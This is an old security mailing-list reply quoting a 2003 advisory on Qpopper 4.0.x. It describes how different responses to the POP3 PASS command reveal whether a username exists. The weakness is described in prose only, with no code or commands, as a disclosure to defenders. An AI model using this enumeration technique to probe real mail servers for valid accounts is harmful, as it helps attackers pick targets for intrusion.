This bug does not exist in QPopper 3.x, as it simply closes the connection regardless of whether the username is valid or not. Regards, Justin Wheeler -- Programmer - A red-eyed, mumbling mammal capable of conversing with inanimate objects. On Wed, 18 Jun 2003, Marc Lafortune wrote: > ============================================================================= > ConnecTalk Inc. Security Advisory > > Topic: Qpopper leaks information during authentication > > Vendor: Eudora > Product: qpopper 4.0.4 and qpopper 4.0.5 > Note: other versions have not been tested. > Problem found: May 14, 2003 > Vendor notification: May 14, 2003 > Second vendor notification: May 21, 2003 > Public notification: June 18, 2003 > > I. Background > > Qpopper is the most widely-used server for the POP3 protocol (this > allows users to access their mail using any POP3 client). Qpopper > supports the latest standards, and includes a large number of optional > features. Qpopper is normally used with standard UNIX mail transfer and > delivery agents such as sendmail or smail. > > II. Problem Description > > When Qpopper is in the authentication phase, using plain text passwords, > the response to the PASS command differs depending on the existance of > the USER. If a valid username and a wrong password are given, Qpopper > returns a negative reponse and waits for one more command before closing > the connection. If an invalid username and password are given, Qpopper > returns a negative response and disconnects right away. > > III. Impact > > A remote attacker can use this information leak to validate the > existance of a user account. > > > -- > Marc Lafortune > mlafortune@connectalk.com > Intégrateur / Integrator > ConnecTalk Inc. > http://www.connectalk.com > > > > >
